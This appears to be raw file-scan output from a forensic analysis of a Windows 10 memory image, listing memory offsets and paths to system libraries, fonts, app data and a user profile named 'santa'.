+0x918b760eeb50	\Users\santa\AppData\Local\ConnectedDevicesPlatform\L.santa\ActivitiesCache.db	216
+0x918b760eece0	\ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd	216
+0x918b760eee70	\Dev\Query	216
+0x918b760ef190	\ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-shm	216
+0x918b760ef320	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{9F531629-9C7B-49B3-838F-43E812031C81}.catalogItem	216
+0x918b760ef4b0	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\S-1-5-21-1046918562-1299961717-1331875240-1001.pckgdep	216
+0x918b760ef640	\CMNotify	216
+0x918b760ef7d0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{B596C7B4-0FE0-4D0E-8F37-E96773FE9F78}.catalogItem	216
+0x918b760ef960	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{C3C2A2A6-3256-41E6-B7A5-B6F3A56D6678}.catalogItem	216
+0x918b760efaf0	\Dev\Query	216
+0x918b760efc80	\Windows\System32\winevt\Logs\Microsoft-Windows-TWinUI%4Operational.evtx	216
+0x918b760efe10	\Windows\SysWOW64\en-US\fwpuclnt.dll.mui	216
+0x918b760f0130	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{B64B03EB-23B1-4C72-85E1-1BAFBC392F07}.catalogItem	216
+0x918b760f02c0	\$Directory	216
+0x918b760f0450	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{BAB5EB9A-271F-464B-BBFB-DBE76F5B333D}.catalogItem	216
+0x918b760f05e0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{C5C5C73B-B43A-4639-B50A-5D6FBE6CF6FC}.catalogItem	216
+0x918b760f0770	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{BFE037EF-488A-4482-B8E5-23DFBA0D2CFE}.catalogItem	216
+0x918b760f0900	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{D1010237-5028-41EA-80E8-F4CD4FB58B20}.catalogItem	216
+0x918b760f0a90	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{BDA779DB-96E8-4B17-BD2C-AD23AA6B4953}.catalogItem	216
+0x918b760f0c20	\Windows\rescache\_merged\1198001884\1532113745.pri	216
+0x918b760f0db0	\Windows\System32\Windows.Internal.Signals.dll	216
+0x918b760f10d0	\Windows\SystemResources\ShellComponents\ShellComponents.pri	216
+0x918b760f1260	\Windows\Registration\R000000000006.clb	216
+0x918b760f13f0	\Windows\System32\TaskFlowDataEngine.dll	216
+0x918b760f1580	\Windows\System32\Windows.Data.Activities.dll	216
+0x918b760f18a0	\Dev\Query	216
+0x918b760f1a30	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{A6A0EBC6-A68F-416F-A217-B6AA98F6FA30}.catalogItem	216
+0x918b760f1ee0	\$Directory	216
+0x918b760f2200	\Users\santa\AppData\Local\ConnectedDevicesPlatform\L.santa\ActivitiesCache.db-wal	216
+0x918b760f2390	\$Directory	216
+0x918b760f2520	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{DD06B977-BF50-499A-9303-B1C89D578889}.catalogItem	216
+0x918b760f26b0	\Windows\System32\LockController.dll	216
+0x918b760f29d0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{EDFCC36C-26F3-474A-9006-29093111FE13}.catalogItem	216
+0x918b760f2b60	\$Directory	216
+0x918b760f2cf0	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b760f31a0	\Windows\Prefetch\DLLHOST.EXE-C2B2ECC1.pf	216
+0x918b760f3330	\Windows\System32\Windows.ApplicationModel.LockScreen.dll	216
+0x918b760f34c0	\Windows\Globalization\ICU\icudtl.dat	216
+0x918b760f3650	\Endpoint	216
+0x918b760f37e0	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b760f3970	\Windows\Globalization\ICU\timezoneTypes.res	216
+0x918b760f3b00	\Windows\System32\PCShellCommonProxyStub.dll	216
+0x918b760f3c90	\$Directory	216
+0x918b760f3e20	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{ED95330E-AF5E-431E-8BA5-9AFF6FE75A1E}.catalogItem	216
+0x918b760f4140	\Users\santa\AppData\Local\ConnectedDevicesPlatform\L.santa\ActivitiesCache.db-shm	216
+0x918b760f42d0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{DA6CD408-E8E4-4098-82A8-B7088801E6B3}.catalogItem	216
+0x918b760f4460	\Windows\SysWOW64\en-US\twinapi.dll.mui	216
+0x918b760f45f0	\Users\santa\AppData\Roaming\Microsoft\Protect\S-1-5-21-1046918562-1299961717-1331875240-1001\Preferred	216
+0x918b760f4780	\$Directory	216
+0x918b760f4910	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{DE3C13E8-0C5B-4A7D-8DF5-E63676E1C3DA}.catalogItem	216
+0x918b760f4aa0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{E651F2E7-9072-4E12-9EB6-4BF1CE4B05FE}.catalogItem	216
+0x918b760f4c30	\Windows\System32\ShellCommonCommonProxyStub.dll	216
+0x918b760f4dc0	\Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{FE986C6C-BD0C-4F58-AE21-E0C338D2E79E}.catalogItem	216
+0x918b760f50e0	\Windows\Prefetch\VMWARERESOLUTIONSET.EXE-F78A3A07.pf	216
+0x918b760f5270	\Server	216
+0x918b760f5590	\Windows\SysWOW64\DataExchange.dll	216
+0x918b760f5720	\$Directory	216
+0x918b760f58b0	\CMApi	216
+0x918b760f5a40	\$Directory	216
+0x918b760f5bd0	\Windows\Registration\R000000000006.clb	216
+0x918b760f5d60	\ProgramData\Microsoft\Windows\OneSettings\CTAC.json	216
+0x918b760f5ef0	\Windows\System32\TaskSchdPS.dll	216
+0x918b760f6080	\Windows\System32\cryptxml.dll	216
+0x918b760f6210	\$Directory	216
+0x918b760f63a0	\Windows\System32\en-US\netmsg.dll.mui	216
+0x918b760f6530	\Windows\System32	216
+0x918b760f66c0	\Windows\System32\mssph.dll	216
+0x918b760f6850	\$Directory	216
+0x918b760f69e0	\CMApi	216
+0x918b760f6b70	\Windows\System32\ngcsvc.dll	216
+0x918b760f6d00	\Program Files\VMware\VMware Tools\VMwareResolutionSet.exe	216
+0x918b760f71b0	\$Directory	216
+0x918b760f74d0	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db	216
+0x918b760f7660	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db	216
+0x918b760f7980	\Windows\System32\icmp.dll	216
+0x918b760f7ca0	\Windows\System32\Windows.Energy.dll	216
+0x918b760f7e30	\$Recycle.Bin\S-1-5-21-1046918562-1299961717-1331875240-1001\desktop.ini	216
+0x918b760f8150	\Users\santa\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_785_POS4.jpg	216
+0x918b760f82e0	\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe	216
+0x918b760f8470	\Reference	216
+0x918b760f8600	\Windows\System32\en-US\shell32.dll.mui	216
+0x918b760f8790	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b760f8ab0	\Windows\System32\NgcCtnrGidsHandler.dll	216
+0x918b760f8c40	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b760f90f0	\Windows\System32\en-US\ncrypt.dll.mui	216
+0x918b760f9280	\Windows\System32\winevt\Logs\Microsoft-Windows-Security-LessPrivilegedAppContainer%4Operational.evtx	216
+0x918b760f9410	\Users\santa\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe	216
+0x918b760f95a0	\Sessions\1\AppContainerNamedObjects\S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312	216
+0x918b760f9730	\Windows\System32\LicenseManagerApi.dll	216
+0x918b760f98c0	\Users\santa\AppData\Local\Microsoft\EdgeUpdate\1.3.181.5\msedgeupdateres_en.dll	216
+0x918b760f9be0	\Windows\SysWOW64\oleaut32.dll	216
+0x918b760f9d70	\CMApi	216
+0x918b760fa090	\$Directory	216
+0x918b760fa220	\Windows\System32\NgcCtnr.dll	216
+0x918b760fa3b0	\Sessions\1\AppContainerNamedObjects\S-1-15-2-515815643-2845804217-1874292103-218650560-777617685-4287762684-137415000	216
+0x918b760fa540	\Windows\System32\Clipc.dll	216
+0x918b760fa6d0	\Windows\SystemResources\shell32.dll.mun	216
+0x918b760fa860	\Users\santa\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe	216
+0x918b760fa9f0	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb	216
+0x918b760fab80	\Windows\System32\NgcCtnrSvc.dll	216
+0x918b760fad10	\Users\santa\AppData\Local\Microsoft\EdgeUpdate\1.3.181.5	216
+0x918b760faea0	\ProgramData\Microsoft\Diagnosis\DownloadedSettings\TELEMETRY.ASM-WINDOWSSQ.json.new	216
+0x918b760fb350	\Windows\System32\en-US\winnlsres.dll.mui	216
+0x918b760fb4e0	\Windows\System32\wuaueng.dll	216
+0x918b760fb670	\$Directory	216
+0x918b760fb800	\$Directory	216
+0x918b760fb990	\Windows\System32\conhost.exe	216
+0x918b760fbb20	\Windows\System32\en-US\InputSwitch.dll.mui	216
+0x918b760fbe40	\Windows\System32\en-US\stobject.dll.mui	216
+0x918b760fc160	\Windows\System32\LicenseManager.dll	216
+0x918b760fc2f0	\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx	216
+0x918b760fc480	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	216
+0x918b760fc610	\Windows\System32\wwapi.dll	216
+0x918b760fc7a0	\Connect	216
+0x918b760fcc50	\Windows\System32\prnfldr.dll	216
+0x918b760fcde0	\Windows\System32\notepad.exe	216
+0x918b760fd290	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.StartMenuExperienceHost_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat	216
+0x918b760fd420	\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe	216
+0x918b760fd5b0	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b760fd740	\Sessions\1\AppContainerNamedObjects\S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708	216
+0x918b760fd8d0	\Windows\System32\en-US\dsreg.dll.mui	216
+0x918b760fda60	\$Directory	216
+0x918b760fdd80	\Windows\System32\en-US\shell32.dll.mui	216
+0x918b760fe0a0	\Windows\System32\cflapi.dll	216
+0x918b760fe3c0	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	216
+0x918b760fe550	\Windows\System32\WPDShServiceObj.dll	216
+0x918b760fe870	\$Directory	216
+0x918b760feb90	\$Directory	216
+0x918b760feeb0	\Dev\Query	216
+0x918b761b3290	\$NonCachedIo	216
+0x918b764971e0	\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy	216
+0x918b76497370	\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\~FontCache-FontSet-S-1-5-21-1046918562-1299961717-1331875240-1001.dat	216
+0x918b76497500	\Windows\System32\en-US\shell32.dll.mui	216
+0x918b764979b0	\$Directory	216
+0x918b76497b40	\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\resources.pri	216
+0x918b76497cd0	\Windows\System32\Windows.UI.Xaml.Resources.th.dll	216
+0x918b76498180	\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\pris\resources.en-US.pri	216
+0x918b764984a0	\Windows\System32\RuntimeBroker.exe	216
+0x918b764987c0	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.LockApp_10.0.18362.1_neutral__cw5n1h2txyewy\ActivationStore.dat	216
+0x918b76498950	\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\~FontCache-S-1-5-21-1046918562-1299961717-1331875240-1001.dat	216
+0x918b76498ae0	\Windows\System32\LockAppBroker.dll	216
+0x918b76498c70	\Windows\System32\Windows.Internal.Shell.Broker.dll	216
+0x918b76498e00	\Windows\System32\Windows.Media.Devices.dll	216
+0x918b76499120	\Windows\System32\appinfoext.dll	216
+0x918b764992b0	\Windows\System32\en-US\napinsp.dll.mui	216
+0x918b76499440	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.LockApp_10.0.18362.1_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1	216
+0x918b76499760	\$Directory	216
+0x918b764998f0	\CMApi	216
+0x918b76499a80	\Windows\rescache\_merged\3900133415\2919480952.pri	216
+0x918b76499c10	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.LockApp_10.0.18362.1_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2	216
+0x918b7649a0c0	\$Directory	216
+0x918b7649a250	\Windows\Fonts\segoeui.ttf	216
+0x918b7649a570	\Program Files\WindowsApps\Microsoft.WindowsStore_12107.1001.15.0_x64__8wekyb3d8bbwe\WinStore.App.dll	216
+0x918b7649abb0	\Sessions\1\AppContainerNamedObjects\S-1-15-2-3539788797-2700867667-1432428195-1581642-2885308443-3834444517-2495346167	216
+0x918b7649ad40	\Windows\Fonts\georgiaz.ttf	216
+0x918b7649b1f0	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b7649b6a0	\Windows\System32\Windows.Services.TargetedContent.dll	216
+0x918b7649bb50	\Windows\Registration\R000000000006.clb	216
+0x918b7649be70	\Windows\System32\en-US\dwmapi.dll.mui	216
+0x918b7649c190	\Windows\System32	216
+0x918b7649c320	\CMApi	216
+0x918b7649c4b0	\Windows\System32\CapabilityAccessManagerClient.dll	216
+0x918b7649c640	\$Directory	216
+0x918b7649c7d0	\Windows\Registration\R000000000006.clb	216
+0x918b7649ce10	\$Directory	216
+0x918b7649d450	\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Internal.Search.winmd	216
+0x918b7649d5e0	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.StartMenuExperienceHost_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat	216
+0x918b7649d770	\Windows\System32\backgroundTaskHost.exe	216
+0x918b7649da90	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.StartMenuExperienceHost_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1	216
+0x918b7649dc20	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.StartMenuExperienceHost_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2	216
+0x918b7649ddb0	\$Directory	216
+0x918b7649e260	\CMApi	216
+0x918b7649e3f0	\Dev\Query	216
+0x918b7649e580	\Dev\Query	216
+0x918b7649e8a0	\Windows\SysWOW64\en-US\pnrpnsp.dll.mui	216
+0x918b7649ea30	\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\resources.pri	216
+0x918b7649ebc0	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b7649ed50	\Windows\System32\MtcModel.dll	216
+0x918b7649f200	\Windows\SystemResources\imageres.dll.mun	216
+0x918b7649f390	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b7649f520	\Windows\System32\SearchIndexer.exe	216
+0x918b7649f6b0	\$Directory	216
+0x918b7649f9d0	\Windows\System32\NcaApi.dll	216
+0x918b7649fcf0	\Windows\System32	216
+0x918b7649fe80	\Windows\Fonts\trebuc.ttf	216
+0x918b764a01a0	\Windows\System32\en-US\AuthExt.dll.mui	216
+0x918b764a0330	\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy	216
+0x918b764a0650	\Dev\Query	216
+0x918b764a07e0	\Users\santa\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat	216
+0x918b764a0970	\Windows\System32\hcproviders.dll	216
+0x918b764a0b00	\Users\santa\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1	216
+0x918b764a0c90	\$Directory	216
+0x918b764a0e20	\$Directory	216
+0x918b764a12d0	\Windows\System32\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll	216
+0x918b764a1780	\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\resources.pri	216
+0x918b764a1910	\$Directory	216
+0x918b764a1aa0	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b764a1c30	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b764a1dc0	\ProgramData\Microsoft\Windows\WER\ReportArchive	216
+0x918b764a20e0	\Windows\ShellExperiences\StartUI.dll	216
+0x918b764a2270	\Windows\System32	216
+0x918b764a2400	\Windows\System32\en-US\ActionCenter.dll.mui	216
+0x918b764a2590	\CMApi	216
+0x918b764a2720	\Windows\Fonts\segoeui.ttf	216
+0x918b764a28b0	\Windows\rescache\_merged\4124255888\4008532806.pri	216
+0x918b764a2a40	\Windows\SystemResources\Windows.UI.ShellCommon\Windows.UI.ShellCommon.pri	216
+0x918b764a2bd0	\$Directory	216
+0x918b764a2d60	\Windows\rescache\_merged\3535846728\48666455.pri	216
+0x918b764a2ef0	\Windows\System32\Windows.Storage.ApplicationData.dll	216
+0x918b764a3080	\Windows\System32\biwinrt.dll	216
+0x918b764a36c0	\Users\santa\AppData\Local\Microsoft\Windows\WER\ERC	216
+0x918b764a3850	\Windows\Fonts\segoeuisl.ttf	216
+0x918b764a39e0	\Windows\System32\en-US\ESENT.dll.mui	216
+0x918b764a3b70	\ProgramData\Microsoft\Search\Data\Applications\Windows\edb.jtx	216
+0x918b764a3e90	\Windows\Fonts\comicbd.ttf	216
+0x918b764a41b0	\Windows\System32\en-US\SearchIndexer.exe.mui	216
+0x918b764a4340	\Windows\Fonts\consolai.ttf	216
+0x918b764a44d0	\$Directory	216
+0x918b764a4660	\Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.18362.30_none_210ac8966535eaa7\GdiPlus.dll	216
+0x918b764a4980	\$Directory	216
+0x918b764a4b10	\$Directory	216
+0x918b764a4ca0	\Windows\System32	216
+0x918b764a4e30	\$ConvertToNonresident	216
+0x918b764a52e0	\Windows\System32	216
+0x918b764a5470	\Windows\Fonts\comic.ttf	216
+0x918b764a5920	\Windows\System32\wermgr.exe	216
+0x918b764a5950	妨癊醋￿妨癊醋￿	0
+0x918b764a5c40	\Windows\Fonts\comici.ttf	216
+0x918b764a5dd0	\Windows\System32\feclient.dll	216
+0x918b764a60f0	\Windows\Fonts\comicz.ttf	216
+0x918b764a6280	\Windows\Fonts\consolab.ttf	216
+0x918b764a6410	\$Directory	216
+0x918b764a65a0	\Windows\Registration\R000000000006.clb	216
+0x918b764a6730	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b764a6a50	\Users\santa\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2	216
+0x918b764a6be0	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.12.3.18362_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat	216
+0x918b764a6d70	\$Directory	216
+0x918b764a7090	\Windows\System32\winevt\Logs\Microsoft-Windows-WindowsBackup%4ActionCenter.evtx	216
+0x918b764a7220	\Users\santa\AppData\Roaming\Microsoft\Windows\Printer Shortcuts	216
+0x918b764a73b0	\Windows\System32\Windows.Globalization.Fontgroups.dll	216
+0x918b764a76d0	\$Directory	216
+0x918b764a7860	\Program Files (x86)\Mozilla Firefox	216
+0x918b764a79f0	\Users\santa\AppData\Roaming\Microsoft\Windows\Printer Shortcuts	216
+0x918b764a7b80	\Windows\System32\RuntimeBroker.exe	216
+0x918b764a7d10	\Windows\Fonts\consolaz.ttf	216
+0x918b764a7ea0	\$Directory	216
+0x918b764a8350	\Users\santa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned	216
+0x918b764a84e0	\ProgramData\Microsoft\Windows\Start Menu\Programs	216
+0x918b764a8670	\Windows	216
+0x918b764a8800	\ProgramData\Microsoft\Windows\Start Menu\Programs	216
+0x918b764a8990	\Windows\System32\BthTelemetry.dll	216
+0x918b764a8b20	\$Directory	216
+0x918b764a8cb0	\$Directory	216
+0x918b764a8e40	\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.jfm	216
+0x918b764a9160	\Windows\System32\fontgroupsoverride.dll	216
+0x918b764a92f0	\Program Files (x86)\Mozilla Firefox	216
+0x918b764a9610	\Users\santa\AppData\Local\Microsoft\Windows\Burn	216
+0x918b764a97a0	\Windows\SystemResources\Windows.UI.ShellCommon\pris\Windows.UI.ShellCommon.en-US.pri	216
+0x918b764a9ac0	\Users\santa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned	216
+0x918b764a9c50	\$Directory	216
+0x918b764a9de0	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b764aa100	\Windows\System32\mssprxy.dll	216
+0x918b764aa420	\CMApi	216
+0x918b764aa5b0	\$Directory	216
+0x918b764aa740	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b764aa8d0	\Users\santa\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin	216
+0x918b764aabf0	\$Directory	216
+0x918b764aad80	\$Directory	216
+0x918b764ab0a0	\Users\santa\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin	216
+0x918b764ab230	\Windows\System32\en-US\hcproviders.dll.mui	216
+0x918b764ab550	\Windows\System32\en-US\Windows.Globalization.dll.mui	216
+0x918b764ab6e0	\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe	216
+0x918b764ab870	\Windows\System32\wuuhosdeployment.dll	216
+0x918b764aba00	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\RuntimeConfiguration.dll	216
+0x918b764abeb0	\Windows\System32\en-US\windows.ui.xaml.dll.mui	216
+0x918b764ac1d0	\ProgramData\Microsoft\Search\Data\Applications\Windows\edb.jtx	216
+0x918b764ac360	\Windows\Fonts\segoeuib.ttf	216
+0x918b764ac4f0	\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx	216
+0x918b764ac680	\Windows\System32\msauserext.dll	216
+0x918b764ac810	\Sessions\1\AppContainerNamedObjects\S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742	216
+0x918b764acb30	\Windows\Fonts\constan.ttf	216
+0x918b764accc0	\$Directory	216
+0x918b764ace50	\$Directory	216
+0x918b764ad170	\$Directory	216
+0x918b764ad300	\Windows\Fonts\constanz.ttf	216
+0x918b764ad490	\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.jfm	216
+0x918b764ad620	\Windows\System32\Windows.Storage.Search.dll	216
+0x918b764ad7b0	\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy	216
+0x918b764ad940	\Windows\System32\RTMediaFrame.dll	216
+0x918b764adc60	\Windows\System32\Windows.Cortana.Desktop.dll	216
+0x918b764ae110	\$Directory	216
+0x918b764ae2a0	\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb	216
+0x918b764ae5c0	\Windows\Fonts\ebrima.ttf	216
+0x918b764ae750	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b764ae8e0	\Windows\System32\SystemSettings.SettingsExtensibility.dll	216
+0x918b764aea70	\Windows\System32\WinBioPlugIns\NUIVoiceWBSAdapters.dll	216
+0x918b764aec00	\Program Files (x86)\Mozilla Firefox\mozavutil.dll	216
+0x918b764af0b0	\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\pris\resources.en-US.pri	216
+0x918b764af3d0	\$Directory	216
+0x918b764af560	\Windows\System32\UIAutomationCore.dll	216
+0x918b764af6f0	\Windows\Fonts\constani.ttf	216
+0x918b764af880	\$Directory	216
+0x918b764afba0	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b764afec0	\$Directory	216
+0x918b764b0370	\Windows\System32\BthAvctpSvc.dll	216
+0x918b764b0500	\Windows\Fonts\cour.ttf	216
+0x918b764b0820	\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\pris\resources.en-US.pri	216
+0x918b764b09b0	\$Directory	216
+0x918b764b0b40	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b764b0cd0	\Windows\System32\winevt\Logs\Microsoft-Windows-TaskScheduler%4Maintenance.evtx	216
+0x918b764b0e60	\$Directory	216
+0x918b764b1180	\$Directory	216
+0x918b764b1310	\MsFteWds	216
+0x918b764b1630	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b764b1ae0	\Program Files (x86)\Mozilla Firefox\mozglue.dll	216
+0x918b764b1e00	\CMApi	216
+0x918b764b2120	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b764b2440	\$Directory	216
+0x918b764b25d0	\Windows\System32\NPSMDesktopProvider.dll	216
+0x918b764b2760	\Program Files (x86)\Mozilla Firefox\firefox.exe	216
+0x918b764b2a80	\Windows\System32\en-US\combase.dll.mui	216
+0x918b764b30c0	\$Directory	216
+0x918b764b3250	\Program Files\Common Files\microsoft shared\ink\IpsPlugin.dll	216
+0x918b764b33e0	\Program Files (x86)\Mozilla Firefox\mozavcodec.dll	216
+0x918b764b3700	\Windows\Fonts\segoeui.ttf	216
+0x918b764b3890	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat.LOG2	216
+0x918b764b3d40	\Windows\System32\msidle.dll	216
+0x918b764b41f0	\Windows\System32\Windows.Cortana.PAL.Desktop.dll	216
+0x918b764b4380	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b764b4510	\Windows\Registration\R000000000006.clb	216
+0x918b764b46a0	\Windows\System32\PersonaX.dll	216
+0x918b764b4830	\Windows\System32\ActionMgr.dll	216
+0x918b764b49c0	\$Directory	216
+0x918b764b4b50	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat	216
+0x918b764b4ce0	\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\resources.pri	216
+0x918b764b5190	\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.2.gthr	216
+0x918b764b5320	\Windows\rescache\_merged\3199136011\4162976336.pri	216
+0x918b764b57d0	\$Directory	216
+0x918b764b5960	\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.2.Crwl	216
+0x918b764b5af0	\Windows\System32\Speech_OneCore\common\sapi_onecore.dll	216
+0x918b764b5e10	\Windows\System32	216
+0x918b764b6130	\Windows\System32\RuntimeBroker.exe	216
+0x918b764b62c0	\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll	216
+0x918b764b6450	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\settings.dat.LOG1	216
+0x918b764b6770	\Users\santa\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat	216
+0x918b764b7260	\Windows\SystemResources\tquery.dll.mun	216
+0x918b764b73f0	\Windows\System32\winevt\Logs\Microsoft-Windows-FileHistory-Core%4WHC.evtx	216
+0x918b764b7580	\Windows\System32\mfplat.dll	216
+0x918b764b7710	\Windows\System32\Windows.Cortana.OneCore.dll	216
+0x918b764b78a0	\Windows\System32\Windows.Cortana.ProxyStub.dll	216
+0x918b764b7a30	\Windows\System32\EdgeManager.dll	216
+0x918b764b7bc0	\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\SecStore\CiST0000.000	216
+0x918b764b7d50	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\Traces\CortanaTrace1.etl	216
+0x918b764b7ee0	\Windows\Registration\R000000000006.clb	216
+0x918b764b8200	\$Directory	216
+0x918b764b8390	\Windows\Fonts\courbd.ttf	216
+0x918b764b8520	\Windows\System32\msftedit.dll	216
+0x918b764b86b0	\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll	216
+0x918b764b8840	\Windows\System32\UserDataTypeHelperUtil.dll	216
+0x918b764b89d0	\Windows\System32\LicenseManagerSvc.dll	216
+0x918b764b8b60	\Windows\Fonts\couri.ttf	216
+0x918b764b8cf0	\Windows\Fonts\courbi.ttf	216
+0x918b764b8e80	\Windows\System32\globinputhost.dll	216
+0x918b764b91a0	\Windows\System32\SpeechPal.dll	216
